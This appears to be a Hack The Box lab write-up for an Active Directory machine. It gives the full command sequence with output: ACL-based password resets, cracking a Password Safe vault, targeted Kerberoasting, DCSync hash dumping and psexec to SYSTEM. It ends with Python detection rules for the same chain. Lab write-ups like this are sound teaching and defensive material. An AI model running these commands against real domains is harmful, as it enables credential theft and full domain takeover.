Hack The Box · Lab
Medium · Windows · Active Directory · Password Attacks

SCOPE

IP           HOSTNAME  DOMAIN             OS
10.10.11.42  DC        administrator.htb  Windows Server 2022 x64

ATTACK

1. Port Scan

nmap -sV -sC -T3 -p21,53,88,139,389,445,5985 10.10.11.42 --open -oN administrator.nmap
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows AD LDAP (Domain: administrator.htb)
445/tcp open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI 2.0

FTP plus a full DC profile. Initial credentials for olivia are provided at machine start.


2. BloodHound — ACL Chain Discovery

Ingest BloodHound data as olivia. The graph reveals a linear delegation chain:

olivia → ForceChangePassword → michael
michael → ForceChangePassword → benjamin
benjamin → FTP access

Each user can reset the next user's password without knowing its current value.


3. ACL Abuse — ForceChangePassword Chain

Reset michael's password using olivia's credentials:

net rpc password 'michael' 'Password123!' \
  -U 'administrator/olivia%<REDACTED>' -S 10.10.11.42

Reset benjamin's password using michael's new credentials:

net rpc password 'benjamin' 'Password123!' \
  -U 'administrator/michael%Password123!' -S 10.10.11.42

4. FTP — Password Safe Archive

Log in to FTP as benjamin:

nxc ftp 10.10.11.42 -u benjamin -p 'Password123!' --ls
[+] benjamin:Password123!
[*] Directory Listing
10-05-24  09:13AM    952  Backup.psafe3

Download the Password Safe 3 archive. The .psafe3 format is a credential vault encrypted with a master password. Crack it:

hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
Backup.psafe3:<REDACTED>

Open the vault with pwsafe or a compatible client; it contains credentials for several domain accounts, including emily.

emily : <REDACTED>

5. Targeted Kerberoasting — ethan

BloodHound shows emily has GenericWrite over ethan, enabling targeted Kerberoasting — assign a temporary SPN to ethan's account and request a TGS:

targetedKerberoast.py -v -d 'administrator.htb' \
  -u 'emily' -p '<REDACTED>' --request-user ethan
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$<hash>

Crack offline:

hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt
<hash>:<REDACTED>

ethan:<REDACTED>


6. DCSync — ethan

ethan has DCSync rights (GetChanges + GetChangesAll). Dump all domain hashes:

secretsdump.py 'administrator.htb/ethan:<REDACTED>@10.10.11.42'
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
...

7. psexec → SYSTEM

psexec.py Administrator@10.10.11.42 -hashes :<REDACTED>
C:\Windows\system32> whoami
nt authority\system

root.txt is at C:\Users\Administrator\Desktop\root.txt.


FULL ATTACK CHAIN

olivia creds provided at start
→ BloodHound: olivia → ForceChangePassword → michael → ForceChangePassword → benjamin
→ net rpc password → reset michael, then benjamin
→ FTP as benjamin → Backup.psafe3
→ hashcat psafe3 → vault password
→ vault contains emily credentials
→ emily GenericWrite over ethan → targetedKerberoast → ethan TGS → crack
→ ethan DCSync → Administrator NTLM
→ psexec → nt authority\system → root.txt
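A defender's view of the same chain, as an added example that is not part of the original writeup: Python detection rules run over constructed Windows Security events for each step (4724 password resets chained transitively, a 5136 servicePrincipalName write followed by an RC4 4769 TGS request, and 4662 replication rights used by a non-machine account). Field names follow the Security log EventData schema; the sample events and the DC$ machine-account name are assumptions.

```python
"""Detection rules for the ForceChangePassword -> targeted Kerberoast -> DCSync chain,
run over constructed sample Security events (dicts of EventData fields, not lab logs)."""
from collections import defaultdict

# Well-known extended-right GUIDs required for DCSync; they appear in the 4662 Properties field.
REPL_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}   # DS-Replication-Get-Changes-All
SPN_VALUE_ADDED = "%%14674"   # 5136 OperationType meaning "value added"
RC4_HMAC = "0x17"             # 4769 TicketEncryptionType for RC4, the crackable etype

SAMPLE_EVENTS = [  # constructed sample data mirroring the attack steps above
    {"EventID": 4724, "SubjectUserName": "olivia", "TargetUserName": "michael"},
    {"EventID": 4724, "SubjectUserName": "michael", "TargetUserName": "benjamin"},
    {"EventID": 4723, "SubjectUserName": "alice", "TargetUserName": "alice"},    # benign self-change
    {"EventID": 5136, "SubjectUserName": "emily", "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": SPN_VALUE_ADDED},
    {"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "ethan",
     "TicketEncryptionType": RC4_HMAC},
    {"EventID": 4769, "TargetUserName": "bob@ADMINISTRATOR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12"},                                            # benign AES TGS
    {"EventID": 4662, "SubjectUserName": "ethan",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},                    # normal DC replication
]

def password_reset_chains(events):
    """4724 = reset of another account's password. Follow resets transitively so the
    olivia -> michael -> benjamin hop sequence is reported as one chain, not two alerts."""
    resets = defaultdict(set)
    for e in events:
        if e["EventID"] == 4724 and e["SubjectUserName"] != e["TargetUserName"]:
            resets[e["SubjectUserName"]].add(e["TargetUserName"])
    chains = []
    def walk(user, path):
        nxts = resets.get(user, set()) - set(path)   # drop cycles
        if not nxts:
            chains.append(path); return
        for nxt in sorted(nxts):
            walk(nxt, path + [nxt])
    for root in sorted(set(resets) - {t for ts in resets.values() for t in ts}):
        walk(root, [root])                            # start only from accounts nobody reset
    return chains

def targeted_kerberoast(events):
    """An SPN added to a user object (5136) followed by an RC4 TGS request for that user (4769)."""
    spn_writes = {e["ObjectDN"].split(",")[0][3:]: e["SubjectUserName"] for e in events
                  if e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == "servicePrincipalName"
                  and e["OperationType"] == SPN_VALUE_ADDED}
    return [(spn_writes[e["ServiceName"]], e["ServiceName"]) for e in events
            if e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
            and e["ServiceName"] in spn_writes]

def dcsync(events):
    """4662 carrying replication extended rights from anything that is not a machine account."""
    return [e["SubjectUserName"] for e in events if e["EventID"] == 4662
            and not e["SubjectUserName"].endswith("$")
            and REPL_GUIDS & set(e["Properties"].replace("{", "").replace("}", "").split())]
```

Each rule maps to one step of the chain, so the three hits together reconstruct the whole path from olivia to Administrator from the DC's own Security log.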

© 0xNRG